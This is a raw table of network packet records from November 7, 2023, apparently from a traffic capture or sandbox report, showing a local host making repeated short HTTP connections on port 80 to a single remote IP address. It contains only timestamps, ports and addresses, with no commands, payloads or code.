Nov 7, 2023 15:21:11.973062038 CET	80	49709	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.973095894 CET	80	49709	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.973238945 CET	49709	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.975229979 CET	49709	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.985018969 CET	49710	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.137303114 CET	80	49710	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.137520075 CET	49710	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.137855053 CET	49710	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.138509035 CET	49710	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.290730000 CET	80	49710	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.290875912 CET	80	49710	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.628182888 CET	80	49710	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.628220081 CET	80	49710	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.628339052 CET	49710	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.630330086 CET	49710	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.640170097 CET	49711	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.793239117 CET	80	49711	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.793440104 CET	49711	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.793735981 CET	49711	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.794464111 CET	49711	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:12.946870089 CET	80	49711	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:12.946897984 CET	80	49711	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.279448032 CET	80	49711	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.279475927 CET	80	49711	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.279560089 CET	49711	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.281083107 CET	49711	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.290002108 CET	49712	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.442277908 CET	80	49712	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.442579031 CET	49712	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.442796946 CET	49712	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.443468094 CET	49712	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.594815969 CET	80	49712	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.595459938 CET	80	49712	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.936122894 CET	80	49712	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.936145067 CET	80	49712	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:13.936353922 CET	49712	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.938085079 CET	49712	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:13.949431896 CET	49713	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.103061914 CET	80	49713	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.103163958 CET	49713	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.106868029 CET	49713	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.107558966 CET	49713	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.259021044 CET	80	49713	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.259597063 CET	80	49713	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.596968889 CET	80	49713	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.596993923 CET	80	49713	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.597214937 CET	49713	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.598716021 CET	49713	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.609107018 CET	49714	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.761811018 CET	80	49714	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.761914015 CET	49714	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.762284994 CET	49714	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.762902021 CET	49714	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:14.915002108 CET	80	49714	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:14.915443897 CET	80	49714	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.242305040 CET	80	49714	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.242338896 CET	80	49714	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.242410898 CET	49714	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.244237900 CET	49714	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.262622118 CET	49715	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.416026115 CET	80	49715	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.416152000 CET	49715	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.416431904 CET	49715	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.417061090 CET	49715	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.569874048 CET	80	49715	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.570641994 CET	80	49715	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.891875982 CET	80	49715	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.891930103 CET	80	49715	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:15.891999006 CET	49715	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.893527031 CET	49715	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:15.902123928 CET	49716	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.054738998 CET	80	49716	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.054898024 CET	49716	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.055195093 CET	49716	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.055929899 CET	49716	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.208698034 CET	80	49716	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.209563017 CET	80	49716	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.534603119 CET	80	49716	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.534672976 CET	80	49716	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.534879923 CET	49716	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.536618948 CET	49716	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.544886112 CET	49717	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.697324038 CET	80	49717	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.697654009 CET	49717	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.697803020 CET	49717	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.698369026 CET	49717	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:16.850025892 CET	80	49717	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:16.850527048 CET	80	49717	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.196544886 CET	80	49717	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.196573973 CET	80	49717	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.196774960 CET	49717	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.198370934 CET	49717	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.491847038 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.644617081 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.644826889 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.645179033 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.645911932 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.797841072 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.798070908 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.798676968 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.798768044 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:17.798782110 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.950695992 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.951248884 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:17.951282978 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:18.459106922 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:18.459167957 CET	80	49718	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:18.459291935 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:18.461261988 CET	49718	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:18.469904900 CET	49719	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:18.626418114 CET	80	49719	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:18.626679897 CET	49719	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:18.626897097 CET	49719	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:18.627553940 CET	49719	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:18.779181957 CET	80	49719	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:18.779650927 CET	80	49719	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.096560001 CET	80	49719	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.096628904 CET	80	49719	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.096955061 CET	49719	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.098474979 CET	49719	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.109915972 CET	49720	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.262274027 CET	80	49720	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.262523890 CET	49720	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.262670994 CET	49720	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.263679981 CET	49720	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.414920092 CET	80	49720	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.415810108 CET	80	49720	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.763941050 CET	80	49720	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.764008045 CET	80	49720	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:19.764137983 CET	49720	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:19.765883923 CET	49720	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.233758926 CET	49721	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.388195038 CET	80	49721	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:20.388326883 CET	49721	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.388657093 CET	49721	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.389355898 CET	49721	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.541146040 CET	80	49721	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:20.541754961 CET	80	49721	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:20.866394997 CET	80	49721	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:20.866480112 CET	80	49721	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:20.866532087 CET	49721	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.873991966 CET	49721	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:20.883688927 CET	49722	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.036223888 CET	80	49722	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:21.036345005 CET	49722	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.036637068 CET	49722	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.037358046 CET	49722	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.189250946 CET	80	49722	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:21.189786911 CET	80	49722	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:21.476569891 CET	80	49722	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:21.476593018 CET	80	49722	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:21.476664066 CET	49722	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.478380919 CET	49722	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.705996037 CET	49723	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.858304977 CET	80	49723	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:21.860368967 CET	49723	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.860368967 CET	49723	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:21.860368967 CET	49723	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:22.012623072 CET	80	49723	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:22.012672901 CET	80	49723	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:22.349776030 CET	80	49723	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:22.349822044 CET	80	49723	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:22.350379944 CET	49723	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.207962036 CET	49723	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.216455936 CET	49724	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.369635105 CET	80	49724	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:23.369781017 CET	49724	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.370007992 CET	49724	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.370559931 CET	49724	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.522278070 CET	80	49724	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:23.522627115 CET	80	49724	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:23.831309080 CET	80	49724	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:23.831345081 CET	80	49724	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:23.831418037 CET	49724	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.833549976 CET	49724	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:23.894649982 CET	49725	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.047230005 CET	80	49725	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.047368050 CET	49725	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.047657967 CET	49725	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.048326969 CET	49725	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.200136900 CET	80	49725	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.200714111 CET	80	49725	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.562489986 CET	80	49725	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.562561989 CET	80	49725	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.562622070 CET	49725	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.564112902 CET	49725	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.615291119 CET	49726	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.767519951 CET	80	49726	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.767931938 CET	49726	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.768737078 CET	49726	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.771217108 CET	49726	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:24.922105074 CET	80	49726	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:24.924062967 CET	80	49726	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.299312115 CET	80	49726	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.299386024 CET	80	49726	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.299451113 CET	49726	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.301177025 CET	49726	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.355402946 CET	49728	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.507821083 CET	80	49728	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.507988930 CET	49728	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.508270025 CET	49728	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.508949995 CET	49728	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.660509109 CET	80	49728	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.661041021 CET	80	49728	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.973602057 CET	80	49728	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.973664045 CET	80	49728	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:25.973790884 CET	49728	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:25.975188017 CET	49728	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:26.012674093 CET	49730	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:26.166143894 CET	80	49730	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:26.166258097 CET	49730	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:26.166460991 CET	49730	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:26.167004108 CET	49730	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:26.319736958 CET	80	49730	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:26.319984913 CET	80	49730	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:26.693097115 CET	80	49730	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:26.693165064 CET	80	49730	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:26.693224907 CET	49730	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:26.695245028 CET	49730	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.040955067 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.193165064 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.193264008 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.193608046 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.194586039 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.345772982 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.345870018 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.346597910 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.346678972 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.346724987 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.346822023 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.500502110 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.501755953 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.501776934 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.933521986 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.933543921 CET	80	49731	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:27.933835030 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.935178995 CET	49731	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:27.979850054 CET	49732	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.131975889 CET	80	49732	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.132117033 CET	49732	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.132359982 CET	49732	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.133181095 CET	49732	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.292033911 CET	80	49732	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.292063951 CET	80	49732	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.599993944 CET	80	49732	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.600016117 CET	80	49732	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.600172997 CET	49732	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.601946115 CET	49732	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.633903027 CET	49733	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.788245916 CET	80	49733	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.788350105 CET	49733	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.789391994 CET	49733	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.797321081 CET	49733	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:28.942058086 CET	80	49733	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:28.949572086 CET	80	49733	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:29.323904037 CET	80	49733	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:29.323923111 CET	80	49733	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:29.323990107 CET	49733	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:29.325706005 CET	49733	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:29.361325026 CET	49734	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:29.513525009 CET	80	49734	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:29.513663054 CET	49734	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:29.513956070 CET	49734	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:29.514621973 CET	49734	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:29.667336941 CET	80	49734	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:29.667855978 CET	80	49734	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.051071882 CET	80	49734	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.051114082 CET	80	49734	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.051186085 CET	49734	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.052659035 CET	49734	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.085875034 CET	49735	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.237983942 CET	80	49735	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.238112926 CET	49735	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.238367081 CET	49735	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.239078999 CET	49735	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.390445948 CET	80	49735	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.391077042 CET	80	49735	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.751826048 CET	80	49735	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.751857042 CET	80	49735	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.751955986 CET	49735	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.753817081 CET	49735	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.796816111 CET	49736	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.950175047 CET	80	49736	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:30.950314999 CET	49736	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.950609922 CET	49736	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:30.951231956 CET	49736	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.102633953 CET	80	49736	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.103218079 CET	80	49736	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.413471937 CET	80	49736	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.413496017 CET	80	49736	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.413573980 CET	49736	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.415275097 CET	49736	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.630189896 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.782423019 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.782584906 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.782855988 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.783643961 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.935004950 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.935100079 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.935679913 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.935698986 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.935714006 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.935739994 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:31.935750008 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:31.935755968 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:32.087174892 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:32.087690115 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:32.087721109 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:32.087790966 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:32.534883022 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:32.534909964 CET	80	49737	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:32.535037994 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:32.536695004 CET	49737	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.237462997 CET	49738	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.389772892 CET	80	49738	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:44.389856100 CET	49738	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.390173912 CET	49738	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.390861034 CET	49738	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.542406082 CET	80	49738	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:44.543044090 CET	80	49738	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:44.862003088 CET	80	49738	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:44.862024069 CET	80	49738	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:44.862162113 CET	49738	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.863724947 CET	49738	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:44.909348965 CET	49739	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.061992884 CET	80	49739	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.062226057 CET	49739	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.062963009 CET	49739	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.065258026 CET	49739	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.215432882 CET	80	49739	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.217694998 CET	80	49739	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.502103090 CET	80	49739	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.502141953 CET	80	49739	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.502234936 CET	49739	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.503967047 CET	49739	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.545553923 CET	49740	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.698052883 CET	80	49740	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.698263884 CET	49740	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.698699951 CET	49740	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:45.699407101 CET	49740	80	192.168.2.8	104.21.84.113
